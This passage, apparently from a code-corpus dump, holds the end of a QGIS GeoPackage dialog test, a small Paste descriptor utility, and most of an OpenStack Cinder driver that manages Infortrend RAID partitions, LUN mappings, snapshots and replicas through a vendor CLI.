dialog.setProperty('question_existing_layer_answer_overwrite', None)
self.assertTrue(self.accepted)
# Only check with OGR 2.0 since the IDENTIFIER and DESCRIPTION creation options don't exist in OGR 1.11
if version_num >= GDAL_COMPUTE_VERSION(2, 0, 0):
layers = QgsProject.instance().mapLayers()
self.assertEqual(len(layers), 1)
layer = layers[list(layers.keys())[0]]
self.assertEqual(layer.name(), 'my_identifier')
QgsProject.instance().removeAllMapLayers()
ds = ogr.Open(dbname)
sql_lyr = ds.ExecuteSQL('SELECT * FROM gpkg_contents')
self.assertEqual(sql_lyr.GetFeatureCount(), 1)
f = sql_lyr.GetNextFeature()
identifier = f.GetField('identifier')
description = f.GetField('description')
f = None
ds.ReleaseResultSet(sql_lyr)
ds = None
self.assertEqual(identifier, 'my_identifier')
self.assertEqual(description, 'my_description')
else:
QgsProject.instance().removeAllMapLayers()
# Try invalid path
mDatabase.setFilePath('/this/is/invalid/test.gpkg')
self.accepted = False
QTest.mouseClick(ok_button, Qt.LeftButton)
self.assertFalse(self.accepted)
# dialog.exec_()
def accepted_slot(self):
self.accepted = True
if __name__ == '__main__':
unittest.main()
|
adrianlee/rcon-cs
|
refs/heads/master
|
rconsoft/util/classinstance.py
|
62
|
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class classinstancemethod(object):
"""
Acts like a class method when called from a class, like an
instance method when called by an instance. The method should
    take two arguments, 'self' and 'cls'; 'self' will be None when
    the method is called on the class, while 'cls' is always bound.
"""
def __init__(self, func):
self.func = func
self.__doc__ = func.__doc__
def __get__(self, obj, type=None):
return _methodwrapper(self.func, obj=obj, type=type)
class _methodwrapper(object):
def __init__(self, func, obj, type):
self.func = func
self.obj = obj
self.type = type
def __call__(self, *args, **kw):
        assert 'self' not in kw and 'cls' not in kw, (
"You cannot use 'self' or 'cls' arguments to a "
"classinstancemethod")
return self.func(*((self.obj, self.type) + args), **kw)
def __repr__(self):
if self.obj is None:
return ('<bound class method %s.%s>'
                % (self.type.__name__, self.func.__name__))
else:
return ('<bound method %s.%s of %r>'
                % (self.type.__name__, self.func.__name__, self.obj))
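
if __name__ == '__main__':
    # Minimal usage sketch (not part of the original Paste module); the
    # class name 'Example' is made up for illustration.  'self' is None
    # when the method is invoked on the class; 'cls' is always the class.
    class Example(object):
        @classinstancemethod
        def where(self, cls):
            return 'class' if self is None else 'instance'

    assert Example.where() == 'class'
    assert Example().where() == 'instance'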
|
cloudbase/cinder
|
refs/heads/master
|
cinder/volume/drivers/infortrend/raidcmd_cli/common_cli.py
|
5
|
# Copyright (c) 2015 Infortrend Technology, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Infortrend Common CLI.
"""
import math
import time
from oslo_concurrency import lockutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import timeutils
from oslo_utils import units
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.volume.drivers.infortrend.raidcmd_cli import cli_factory as cli
from cinder.volume.drivers.san import san
from cinder.volume import volume_types
from cinder.zonemanager import utils as fczm_utils
LOG = logging.getLogger(__name__)
infortrend_esds_opts = [
cfg.StrOpt('infortrend_pools_name',
default='',
               help='Comma-separated list of Infortrend RAID pool names.'),
cfg.StrOpt('infortrend_cli_path',
default='/opt/bin/Infortrend/raidcmd_ESDS10.jar',
help='The Infortrend CLI absolute path. '
'By default, it is at '
'/opt/bin/Infortrend/raidcmd_ESDS10.jar'),
cfg.IntOpt('infortrend_cli_max_retries',
default=5,
               help='Maximum number of CLI retries. Default is 5.'),
cfg.IntOpt('infortrend_cli_timeout',
default=30,
               help='Default timeout for CLI copy operations, in minutes. '
                    'This applies to migrate volume, create cloned volume '
                    'and create volume from snapshot. '
                    'By default, it is 30 minutes.'),
cfg.StrOpt('infortrend_slots_a_channels_id',
default='0,1,2,3,4,5,6,7',
               help='Comma-separated list of Infortrend RAID channel IDs '
                    'on Slot A for OpenStack usage. '
                    'By default, channels 0-7 are used.'),
cfg.StrOpt('infortrend_slots_b_channels_id',
default='0,1,2,3,4,5,6,7',
               help='Comma-separated list of Infortrend RAID channel IDs '
                    'on Slot B for OpenStack usage. '
                    'By default, channels 0-7 are used.'),
]
infortrend_esds_extra_opts = [
cfg.StrOpt('infortrend_provisioning',
default='full',
               help='The provisioning type used for new volumes. '
                    'By default, it is full provisioning. '
                    'The supported options are full and thin.'),
cfg.StrOpt('infortrend_tiering',
default='0',
               help='The tiering level used for new volumes. '
                    'By default, it is level 0. '
                    'The supported levels are 0, 2, 3 and 4.'),
]
CONF = cfg.CONF
CONF.register_opts(infortrend_esds_opts)
CONF.register_opts(infortrend_esds_extra_opts)
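# Maps each CLI command to its failure log messages.  The optional 'warning'
# sub-dict lists return codes that are only logged as warnings; any other
# non-zero return code raises InfortrendCliException (see _execute below).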
CLI_RC_FILTER = {
'CreatePartition': {'error': _('Failed to create partition.')},
'DeletePartition': {'error': _('Failed to delete partition.')},
'SetPartition': {'error': _('Failed to set partition.')},
'CreateMap': {
'warning': {20: _LW('The MCS Channel is grouped.')},
'error': _('Failed to create map.'),
},
'DeleteMap': {
'warning': {11: _LW('No mapping.')},
'error': _('Failed to delete map.'),
},
'CreateSnapshot': {'error': _('Failed to create snapshot.')},
'DeleteSnapshot': {'error': _('Failed to delete snapshot.')},
'CreateReplica': {'error': _('Failed to create replica.')},
'DeleteReplica': {'error': _('Failed to delete replica.')},
'CreateIQN': {
'warning': {20: _LW('IQN already existed.')},
'error': _('Failed to create iqn.'),
},
'DeleteIQN': {
'warning': {
20: _LW('IQN has been used to create map.'),
11: _LW('No such host alias name.'),
},
'error': _('Failed to delete iqn.'),
},
'ShowLV': {'error': _('Failed to get lv info.')},
'ShowPartition': {'error': _('Failed to get partition info.')},
'ShowSnapshot': {'error': _('Failed to get snapshot info.')},
'ShowDevice': {'error': _('Failed to get device info.')},
'ShowChannel': {'error': _('Failed to get channel info.')},
'ShowMap': {'error': _('Failed to get map info.')},
'ShowNet': {'error': _('Failed to get network info.')},
'ShowLicense': {'error': _('Failed to get license info.')},
'ShowReplica': {'error': _('Failed to get replica info.')},
'ShowWWN': {'error': _('Failed to get wwn info.')},
'ShowIQN': {'error': _('Failed to get iqn info.')},
'ExecuteCommand': {'error': _('Failed to execute common command.')},
}
def log_func(func):
def inner(self, *args, **kwargs):
LOG.debug('Entering: %(method)s', {'method': func.__name__})
start = timeutils.utcnow()
ret = func(self, *args, **kwargs)
end = timeutils.utcnow()
LOG.debug(
'Leaving: %(method)s, '
'Spent: %(time)s sec, '
'Return: %(ret)s.', {
'method': func.__name__,
'time': timeutils.delta_seconds(start, end),
'ret': ret})
return ret
return inner
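# Capacity helpers: the CLI reports sizes in MiB while Cinder works in GiB.
# units.Mi and units.Gi are the binary multipliers from oslo.utils, so
# mi_to_gi(1024) == 1.0 and gi_to_mi(1) == 1024.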
def mi_to_gi(mi_size):
return mi_size * units.Mi / units.Gi
def gi_to_mi(gi_size):
return gi_size * units.Gi / units.Mi
class InfortrendCommon(object):
"""The Infortrend's Common Command using CLI.
Version history:
1.0.0 - Initial driver
1.0.1 - Support DS4000
1.0.2 - Support GS Series
"""
VERSION = '1.0.2'
constants = {
'ISCSI_PORT': 3260,
'MAX_LUN_MAP_PER_CHL': 128
}
provisioning_values = ['thin', 'full']
tiering_values = ['0', '2', '3', '4']
def __init__(self, protocol, configuration=None):
self.protocol = protocol
self.configuration = configuration
self.configuration.append_config_values(san.san_opts)
self.configuration.append_config_values(infortrend_esds_opts)
self.configuration.append_config_values(infortrend_esds_extra_opts)
self.iscsi_multipath = self.configuration.use_multipath_for_image_xfer
self.path = self.configuration.infortrend_cli_path
self.password = self.configuration.san_password
self.ip = self.configuration.san_ip
self.cli_retry_time = self.configuration.infortrend_cli_max_retries
self.cli_timeout = self.configuration.infortrend_cli_timeout * 60
self.iqn = 'iqn.2002-10.com.infortrend:raid.uid%s.%s%s%s'
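        # Filled in later by _generate_iqn with
        # (system_id, mcs_id, target_id, slot_id).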
self.unmanaged_prefix = 'cinder-unmanaged-%s'
if self.ip == '':
msg = _('san_ip is not set.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
self.fc_lookup_service = fczm_utils.create_lookup_service()
self._volume_stats = None
self._model_type = 'R'
self._replica_timeout = self.cli_timeout
self.map_dict = {
'slot_a': {},
'slot_b': {},
}
self.map_dict_init = False
self.target_dict = {
'slot_a': {},
'slot_b': {},
}
if self.protocol == 'iSCSI':
self.mcs_dict = {
'slot_a': {},
'slot_b': {},
}
self._init_pool_list()
self._init_channel_list()
self.cli_conf = {
'path': self.path,
'password': self.password,
'ip': self.ip,
'cli_retry_time': int(self.cli_retry_time),
}
def _init_pool_list(self):
pools_name = self.configuration.infortrend_pools_name
if pools_name == '':
msg = _('Pools name is not set.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
tmp_pool_list = pools_name.split(',')
self.pool_list = [pool.strip() for pool in tmp_pool_list]
def _init_channel_list(self):
self.channel_list = {
'slot_a': [],
'slot_b': [],
}
tmp_channel_list = (
self.configuration.infortrend_slots_a_channels_id.split(',')
)
self.channel_list['slot_a'] = (
[channel.strip() for channel in tmp_channel_list]
)
tmp_channel_list = (
self.configuration.infortrend_slots_b_channels_id.split(',')
)
self.channel_list['slot_b'] = (
[channel.strip() for channel in tmp_channel_list]
)
def _execute_command(self, cli_type, *args, **kwargs):
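        # Resolve the command class (e.g. cli.ShowLV) from cli_factory by
        # name, then run it with the shared CLI connection configuration.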
command = getattr(cli, cli_type)
return command(self.cli_conf).execute(*args, **kwargs)
def _execute(self, cli_type, *args, **kwargs):
LOG.debug('Executing command type: %(type)s.', {'type': cli_type})
rc, out = self._execute_command(cli_type, *args, **kwargs)
if rc != 0:
if ('warning' in CLI_RC_FILTER[cli_type] and
rc in CLI_RC_FILTER[cli_type]['warning']):
LOG.warning(CLI_RC_FILTER[cli_type]['warning'][rc])
else:
msg = CLI_RC_FILTER[cli_type]['error']
LOG.error(msg)
raise exception.InfortrendCliException(
err=msg, param=args, rc=rc, out=out)
return rc, out
@log_func
def _init_map_info(self, multipath=False):
if not self.map_dict_init:
rc, channel_info = self._execute('ShowChannel')
if 'BID' in channel_info[0]:
self._model_type = 'R'
else:
self._model_type = 'G'
self._set_channel_id(channel_info, 'slot_a', multipath)
if multipath and self._model_type == 'R':
self._set_channel_id(channel_info, 'slot_b', multipath)
self.map_dict_init = True
@log_func
def _update_map_info(self, multipath=False):
"""Record the driver mapping information.
map_dict = {
'slot_a': {
'0': [1, 2, 3, 4] # Slot A Channel 0 map lun 1, 2, 3, 4
},
'slot_b' : {
'1': [0, 1, 3] # Slot B Channel 1 map lun 0, 1, 3
}
}
"""
rc, map_info = self._execute('ShowMap')
self._update_map_info_by_slot(map_info, 'slot_a')
if multipath and self._model_type == 'R':
self._update_map_info_by_slot(map_info, 'slot_b')
return map_info
@log_func
def _update_map_info_by_slot(self, map_info, slot_key):
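        # Reset each channel to the full free-LUN range, then remove every
        # LUN that ShowMap reports as already mapped on that target.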
for key, value in self.map_dict[slot_key].items():
self.map_dict[slot_key][key] = list(
range(self.constants['MAX_LUN_MAP_PER_CHL']))
if len(map_info) > 0 and isinstance(map_info, list):
for entry in map_info:
ch = entry['Ch']
lun = entry['LUN']
if ch not in self.map_dict[slot_key].keys():
continue
target_id = self.target_dict[slot_key][ch]
if (entry['Target'] == target_id and
int(lun) in self.map_dict[slot_key][ch]):
self.map_dict[slot_key][ch].remove(int(lun))
def _check_initiator_has_lun_map(self, initiator_info, map_info):
if not isinstance(initiator_info, list):
initiator_info = (initiator_info,)
for initiator_name in initiator_info:
for entry in map_info:
if initiator_name.lower() == entry['Host-ID'].lower():
return True
return False
@log_func
def _set_channel_id(
self, channel_info, controller='slot_a', multipath=False):
if self.protocol == 'iSCSI':
check_channel_type = ('NETWORK', 'LAN')
else:
check_channel_type = ('FIBRE', 'Fibre')
for entry in channel_info:
if entry['Type'] in check_channel_type:
if entry['Ch'] in self.channel_list[controller]:
self.map_dict[controller][entry['Ch']] = []
if self.protocol == 'iSCSI':
self._update_mcs_dict(
entry['Ch'], entry['MCS'], controller)
self._update_target_dict(entry, controller)
@log_func
def _update_target_dict(self, channel, controller):
"""Record the target id for mapping.
# R model
target_dict = {
'slot_a': {
'0': '0',
'1': '0',
},
'slot_b': {
'0': '1',
'1': '1',
},
}
# G model
target_dict = {
'slot_a': {
'2': '32',
'3': '112',
}
}
"""
if self._model_type == 'G':
self.target_dict[controller][channel['Ch']] = channel['ID']
else:
if controller == 'slot_a':
self.target_dict[controller][channel['Ch']] = channel['AID']
else:
self.target_dict[controller][channel['Ch']] = channel['BID']
def _update_mcs_dict(self, channel_id, mcs_id, controller):
"""Record the iSCSI MCS topology.
        # R model with MCS; note that MCS does not work with iSCSI multipath
mcs_dict = {
'slot_a': {
'0': ['0', '1'],
'1': ['2']
},
'slot_b': {
'0': ['0', '1'],
'1': ['2']
}
}
# G model with mcs
mcs_dict = {
'slot_a': {
'0': ['0', '1'],
'1': ['2']
},
'slot_b': {}
}
"""
if mcs_id not in self.mcs_dict[controller]:
self.mcs_dict[controller][mcs_id] = []
self.mcs_dict[controller][mcs_id].append(channel_id)
def _check_tiers_setup(self):
tiering = self.configuration.infortrend_tiering
if tiering != '0':
self._check_extraspec_value(
tiering, self.tiering_values)
tier_levels_list = list(range(int(tiering)))
tier_levels_list = list(map(str, tier_levels_list))
rc, lv_info = self._execute('ShowLV', 'tier')
for pool in self.pool_list:
support_tier_levels = tier_levels_list[:]
for entry in lv_info:
if (entry['LV-Name'] == pool and
entry['Tier'] in support_tier_levels):
support_tier_levels.remove(entry['Tier'])
if len(support_tier_levels) == 0:
break
if len(support_tier_levels) != 0:
msg = _('Please create %(tier_levels)s '
'tier in pool %(pool)s in advance!') % {
'tier_levels': support_tier_levels,
'pool': pool}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _check_pools_setup(self):
pool_list = self.pool_list[:]
rc, lv_info = self._execute('ShowLV')
for lv in lv_info:
if lv['Name'] in pool_list:
pool_list.remove(lv['Name'])
if len(pool_list) == 0:
break
if len(pool_list) != 0:
msg = _('Please create %(pool_list)s pool in advance!') % {
'pool_list': pool_list}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def check_for_setup_error(self):
self._check_pools_setup()
self._check_tiers_setup()
def create_volume(self, volume):
"""Create a Infortrend partition."""
volume_id = volume['id'].replace('-', '')
self._create_partition_by_default(volume)
part_id = self._get_part_id(volume_id)
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': part_id,
}
model_update = {
"provider_location": self._concat_provider_location(model_dict),
}
LOG.info(_LI('Create Volume %(volume_id)s completed.'), {
'volume_id': volume_id})
return model_update
def _create_partition_by_default(self, volume):
pool_id = self._get_target_pool_id(volume)
self._create_partition_with_pool(volume, pool_id)
def _create_partition_with_pool(
self, volume, pool_id, extraspecs=None):
volume_id = volume['id'].replace('-', '')
volume_size = gi_to_mi(volume['size'])
if extraspecs is None:
extraspecs = self._get_extraspecs_dict(volume['volume_type_id'])
provisioning = self._get_extraspecs_value(extraspecs, 'provisioning')
tiering = self._get_extraspecs_value(extraspecs, 'tiering')
extraspecs_dict = {}
cmd = ''
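        # Thin partitions reserve 20% of the requested size up front (passed
        # to the CLI as min=<size>MB) and skip initialization.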
if provisioning == 'thin':
provisioning = int(volume_size * 0.2)
extraspecs_dict['provisioning'] = provisioning
extraspecs_dict['init'] = 'disable'
else:
self._check_extraspec_value(
provisioning, self.provisioning_values)
if tiering != '0':
self._check_extraspec_value(
tiering, self.tiering_values)
tier_levels_list = list(range(int(tiering)))
tier_levels_list = list(map(str, tier_levels_list))
self._check_tiering_existing(tier_levels_list, pool_id)
extraspecs_dict['provisioning'] = 0
extraspecs_dict['init'] = 'disable'
if extraspecs_dict:
cmd = self._create_part_parameters_str(extraspecs_dict)
commands = (pool_id, volume_id, 'size=%s' % int(volume_size), cmd)
self._execute('CreatePartition', *commands)
def _create_part_parameters_str(self, extraspecs_dict):
parameters_list = []
parameters = {
'provisioning': 'min=%sMB',
'tiering': 'tier=%s',
'init': 'init=%s',
}
for extraspec in extraspecs_dict.keys():
value = parameters[extraspec] % (extraspecs_dict[extraspec])
parameters_list.append(value)
cmd = ' '.join(parameters_list)
return cmd
def _check_tiering_existing(self, tier_levels, pool_id):
rc, lv_info = self._execute('ShowLV', 'tier')
for entry in lv_info:
if entry['LV-ID'] == pool_id and entry['Tier'] in tier_levels:
tier_levels.remove(entry['Tier'])
if len(tier_levels) == 0:
break
if len(tier_levels) != 0:
            msg = _('Tier(s) %(tier_levels)s have not been created.') % {
'tier_levels': tier_levels}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
@log_func
def _create_map_with_lun_filter(
self, part_id, channel_id, lun_id, host, controller='slot_a'):
host_filter = self._create_target_id_and_host_filter(
controller, host)
target_id = self.target_dict[controller][channel_id]
commands = (
'part', part_id, channel_id, target_id, lun_id, host_filter
)
self._execute('CreateMap', *commands)
@log_func
def _create_map_with_mcs(
self, part_id, channel_list, lun_id, host, controller='slot_a'):
map_channel_id = None
for channel_id in channel_list:
host_filter = self._create_target_id_and_host_filter(
controller, host)
target_id = self.target_dict[controller][channel_id]
commands = (
'part', part_id, channel_id, target_id, lun_id,
host_filter
)
rc, out = self._execute('CreateMap', *commands)
if rc == 0:
map_channel_id = channel_id
break
if map_channel_id is None:
msg = _('Failed to create map on mcs, no channel can map.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return map_channel_id
def _create_target_id_and_host_filter(self, controller, host):
if self.protocol == 'iSCSI':
host_filter = 'iqn=%s' % host
else:
host_filter = 'wwn=%s' % host
return host_filter
def _get_extraspecs_dict(self, volume_type_id):
extraspecs = {}
if volume_type_id:
extraspecs = volume_types.get_volume_type_extra_specs(
volume_type_id)
return extraspecs
def _get_extraspecs_value(self, extraspecs, key):
value = None
if key == 'provisioning':
if (extraspecs and
'infortrend_provisioning' in extraspecs.keys()):
value = extraspecs['infortrend_provisioning'].lower()
else:
value = self.configuration.infortrend_provisioning.lower()
elif key == 'tiering':
value = self.configuration.infortrend_tiering
return value
def _select_most_free_capacity_pool_id(self, lv_info):
largest_free_capacity_gb = 0.0
dest_pool_id = None
for lv in lv_info:
if lv['Name'] in self.pool_list:
available_space = float(lv['Available'].split(' ', 1)[0])
free_capacity_gb = round(mi_to_gi(available_space))
if free_capacity_gb > largest_free_capacity_gb:
largest_free_capacity_gb = free_capacity_gb
dest_pool_id = lv['ID']
return dest_pool_id
def _get_target_pool_id(self, volume):
extraspecs = self._get_extraspecs_dict(volume['volume_type_id'])
pool_id = None
rc, lv_info = self._execute('ShowLV')
if 'pool_name' in extraspecs.keys():
poolname = extraspecs['pool_name']
for entry in lv_info:
if entry['Name'] == poolname:
pool_id = entry['ID']
else:
pool_id = self._select_most_free_capacity_pool_id(lv_info)
if pool_id is None:
msg = _('Failed to get pool id with volume %(volume_id)s.') % {
'volume_id': volume['id']}
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return pool_id
def _get_system_id(self, system_ip):
rc, device_info = self._execute('ShowDevice')
for entry in device_info:
if system_ip == entry['Connected-IP']:
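                # 'ID' is reported in hex; return its decimal string form.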
return str(int(entry['ID'], 16))
return
@log_func
def _get_lun_id(self, ch_id, controller='slot_a'):
lun_id = -1
if len(self.map_dict[controller][ch_id]) > 0:
lun_id = self.map_dict[controller][ch_id][0]
self.map_dict[controller][ch_id].remove(lun_id)
if lun_id == -1:
msg = _('LUN number is out of bound '
'on channel id: %(ch_id)s.') % {'ch_id': ch_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
return lun_id
@log_func
def _get_mapping_info(self, multipath):
if self.iscsi_multipath or multipath:
return self._get_mapping_info_with_mcs()
else:
return self._get_mapping_info_with_normal()
def _get_mapping_info_with_mcs(self):
"""Get the minimun mapping channel id and multi lun id mapping info.
# R model with mcs
map_chl = {
'slot_a': ['0', '1']
}
map_lun = ['0']
# G model with mcs
map_chl = {
'slot_a': ['1', '2']
}
map_lun = ['0']
        :returns: minimum mapping channel id per slot and multi lun id
"""
map_chl = {
'slot_a': []
}
min_lun_num = 0
map_mcs_group = None
for mcs in self.mcs_dict['slot_a']:
if len(self.mcs_dict['slot_a'][mcs]) > 1:
if min_lun_num < self._get_mcs_channel_lun_map_num(mcs):
min_lun_num = self._get_mcs_channel_lun_map_num(mcs)
map_mcs_group = mcs
if map_mcs_group is None:
            msg = _('RAID does not have an MCS channel.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
map_chl['slot_a'] = self.mcs_dict['slot_a'][map_mcs_group]
map_lun = self._get_mcs_channel_lun_map(map_chl['slot_a'])
return map_chl, map_lun, map_mcs_group
def _get_mcs_channel_lun_map_num(self, mcs_id):
lun_num = 0
for channel in self.mcs_dict['slot_a'][mcs_id]:
lun_num += len(self.map_dict['slot_a'][channel])
return lun_num
def _get_mcs_channel_lun_map(self, channel_list):
"""Find the common lun id in mcs channel."""
map_lun = []
for lun_id in range(self.constants['MAX_LUN_MAP_PER_CHL']):
check_map = True
for channel_id in channel_list:
if lun_id not in self.map_dict['slot_a'][channel_id]:
check_map = False
if check_map:
map_lun.append(str(lun_id))
break
return map_lun
@log_func
def _get_mapping_info_with_normal(self):
"""Get the minimun mapping channel id and lun id mapping info.
# G model and R model
map_chl = {
'slot_a': ['1']
}
map_lun = ['0']
        :returns: minimum mapping channel id per slot and lun id
"""
map_chl = {
'slot_a': []
}
map_lun = []
        ret_chl = self._get_minimum_mapping_channel_id('slot_a')
lun_id = self._get_lun_id(ret_chl, 'slot_a')
mcs_id = self._get_mcs_id_by_channel_id(ret_chl)
map_chl['slot_a'].append(ret_chl)
map_lun.append(str(lun_id))
return map_chl, map_lun, mcs_id
@log_func
    def _get_minimum_mapping_channel_id(self, controller):
empty_lun_num = 0
min_map_chl = -1
# Sort items to get a reliable behaviour. Dictionary items
# are iterated in a random order because of hash randomization.
for key, value in sorted(self.map_dict[controller].items()):
if empty_lun_num < len(value):
min_map_chl = key
empty_lun_num = len(value)
if int(min_map_chl) < 0:
msg = _('LUN map overflow on every channel.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
else:
return min_map_chl
def _get_common_lun_map_id(self, wwpn_channel_info):
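        # Scan LUN ids 0..MAX_LUN_MAP_PER_CHL-1 and return the first id that
        # is still free on every channel used by any of the target WWPNs.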
map_lun = None
for lun_id in range(self.constants['MAX_LUN_MAP_PER_CHL']):
lun_id_exist = False
for slot_name in ['slot_a', 'slot_b']:
for wwpn in wwpn_channel_info:
channel_id = wwpn_channel_info[wwpn]['channel']
if channel_id not in self.map_dict[slot_name]:
continue
elif lun_id not in self.map_dict[slot_name][channel_id]:
lun_id_exist = True
if not lun_id_exist:
map_lun = str(lun_id)
break
return map_lun
def _get_mcs_id_by_channel_id(self, channel_id):
mcs_id = None
for mcs in self.mcs_dict['slot_a']:
if channel_id in self.mcs_dict['slot_a'][mcs]:
mcs_id = mcs
break
if mcs_id is None:
msg = _('Cannot get mcs_id by channel id: %(channel_id)s.') % {
'channel_id': channel_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
return mcs_id
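    # provider_location is serialized as 'key^value' pairs joined by '@'
    # (e.g. 'system_id^<id>@partition_id^<id>'); see
    # _extract_all_provider_location for the inverse parsing.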
def _concat_provider_location(self, model_dict):
return '@'.join([i + '^' + str(model_dict[i]) for i in model_dict])
def delete_volume(self, volume):
"""Delete the specific volume."""
volume_id = volume['id'].replace('-', '')
has_pair = False
have_map = False
part_id = self._extract_specific_provider_location(
volume['provider_location'], 'partition_id')
(check_exist, have_map, part_id) = (
self._check_volume_exist(volume_id, part_id)
)
if not check_exist:
LOG.warning(_LW('Volume %(volume_id)s already deleted.'), {
'volume_id': volume_id})
return
rc, replica_list = self._execute('ShowReplica', '-l')
for entry in replica_list:
if (volume_id == entry['Source-Name'] and
part_id == entry['Source']):
if not self._check_replica_completed(entry):
has_pair = True
                    LOG.warning(_LW('Volume is still %(status)s. '
'Cannot delete volume.'), {
'status': entry['Status']})
else:
have_map = entry['Source-Mapped'] == 'Yes'
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
elif (volume_id == entry['Target-Name'] and
part_id == entry['Target']):
have_map = entry['Target-Mapped'] == 'Yes'
self._execute('DeleteReplica', entry['Pair-ID'], '-y')
if not has_pair:
rc, snapshot_list = self._execute(
'ShowSnapshot', 'part=%s' % part_id)
for snapshot in snapshot_list:
si_has_pair = self._delete_pair_with_snapshot(
snapshot['SI-ID'], replica_list)
if si_has_pair:
msg = _('Failed to delete SI '
'for volume_id: %(volume_id)s '
'because it has pair.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
self._execute('DeleteSnapshot', snapshot['SI-ID'], '-y')
rc, map_info = self._execute('ShowMap', 'part=%s' % part_id)
if have_map or len(map_info) > 0:
self._execute('DeleteMap', 'part', part_id, '-y')
self._execute('DeletePartition', part_id, '-y')
LOG.info(_LI('Delete Volume %(volume_id)s completed.'), {
'volume_id': volume_id})
else:
msg = _('Failed to delete volume '
'for volume_id: %(volume_id)s '
'because it has pair.') % {
'volume_id': volume_id}
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def _check_replica_completed(self, replica):
if ((replica['Type'] == 'Copy' and replica['Status'] == 'Completed') or
(replica['Type'] == 'Mirror' and
replica['Status'] == 'Mirror')):
return True
return False
def _check_volume_exist(self, volume_id, part_id):
check_exist = False
have_map = False
result_part_id = part_id
rc, part_list = self._execute('ShowPartition', '-l')
for entry in part_list:
if entry['Name'] == volume_id:
check_exist = True
if part_id is None:
result_part_id = entry['ID']
if entry['Mapped'] == 'true':
have_map = True
if check_exist:
return (check_exist, have_map, result_part_id)
else:
return (False, False, None)
def create_cloned_volume(self, volume, src_vref):
"""Create a clone of the volume by volume copy."""
volume_id = volume['id'].replace('-', '')
# Step1 create a snapshot of the volume
src_part_id = self._extract_specific_provider_location(
src_vref['provider_location'], 'partition_id')
if src_part_id is None:
src_part_id = self._get_part_id(volume_id)
model_update = self._create_volume_from_volume(volume, src_part_id)
LOG.info(_LI('Create Cloned Volume %(volume_id)s completed.'), {
'volume_id': volume['id']})
return model_update
def _create_volume_from_volume(self, dst_volume, src_part_id):
# create the target volume for volume copy
dst_volume_id = dst_volume['id'].replace('-', '')
self._create_partition_by_default(dst_volume)
dst_part_id = self._get_part_id(dst_volume_id)
# prepare return value
system_id = self._get_system_id(self.ip)
model_dict = {
'system_id': system_id,
'partition_id': dst_part_id,
}
model_info = self._concat_provider_location(model_dict)
model_update = {"provider_location": model_info}
# clone the volume from the origin partition
commands = (
'Cinder-Cloned', 'part', src_part_id, 'part', dst_part_id
)
self._execute('CreateReplica', *commands)
self._wait_replica_complete(dst_part_id)
return model_update
def _extract_specific_provider_location(self, provider_location, key):
provider_location_dict = self._extract_all_provider_location(
provider_location)
result = provider_location_dict.get(key, None)
return result
@log_func
def _extract_all_provider_location(self, provider_location):
provider_location_dict = {}
dict_entry = provider_location.split("@")
for entry in dict_entry:
key, value = entry.split('^', 1)
if value == 'None':
value = None
provider_location_dict[key] = value
return provider_location_dict
def create_export(self, context, volume):
model_update = volume['provider_location']
LOG.info(_LI('Create export done from Volume %(volume_id)s.'), {
'volume_id': volume['id']})
return {'provider_location': model_update}
def get_volume_stats(self, refresh=False):
"""Get volume status.
If refresh is True, update the status first.
"""
if self._volume_stats is None or refresh:
self._update_volume_stats()
LOG.info(_LI(
            'Successfully updated volume stats. '
'backend: %(volume_backend_name)s, '
'vendor: %(vendor_name)s, '
'driver version: %(driver_version)s, '
'storage protocol: %(storage_protocol)s.'), self._volume_stats)
return self._volume_stats
def _update_volume_stats(self):
backend_name = self.configuration.safe_get('volume_backend_name')
data = {
'volume_backend_name': backend_name,
'vendor_name': 'Infortrend',
'driver_version': self.VERSION,
'storage_protocol': self.protocol,
'pools': self._update_pools_stats(),
}
self._volume_stats = data
def _update_pools_stats(self):
enable_specs_dict = self._get_enable_specs_on_array()
if 'Thin Provisioning' in enable_specs_dict.keys():
provisioning = 'thin'
provisioning_support = True
else:
provisioning = 'full'
provisioning_support = False
rc, part_list = self._execute('ShowPartition', '-l')
rc, pools_info = self._execute('ShowLV')
pools = []
for pool in pools_info:
if pool['Name'] in self.pool_list:
total_space = float(pool['Size'].split(' ', 1)[0])
available_space = float(pool['Available'].split(' ', 1)[0])
total_capacity_gb = round(mi_to_gi(total_space), 2)
free_capacity_gb = round(mi_to_gi(available_space), 2)
provisioning_factor = self.configuration.safe_get(
'max_over_subscription_ratio')
provisioned_space = self._get_provisioned_space(
pool['ID'], part_list)
provisioned_capacity_gb = round(mi_to_gi(provisioned_space), 2)
new_pool = {
'pool_name': pool['Name'],
'pool_id': pool['ID'],
'total_capacity_gb': total_capacity_gb,
'free_capacity_gb': free_capacity_gb,
'reserved_percentage': 0,
'QoS_support': False,
'provisioned_capacity_gb': provisioned_capacity_gb,
'max_over_subscription_ratio': provisioning_factor,
'thin_provisioning_support': provisioning_support,
'thick_provisioning_support': True,
'infortrend_provisioning': provisioning,
}
pools.append(new_pool)
return pools
def _get_provisioned_space(self, pool_id, part_list):
provisioning_space = 0
for entry in part_list:
if entry['LV-ID'] == pool_id:
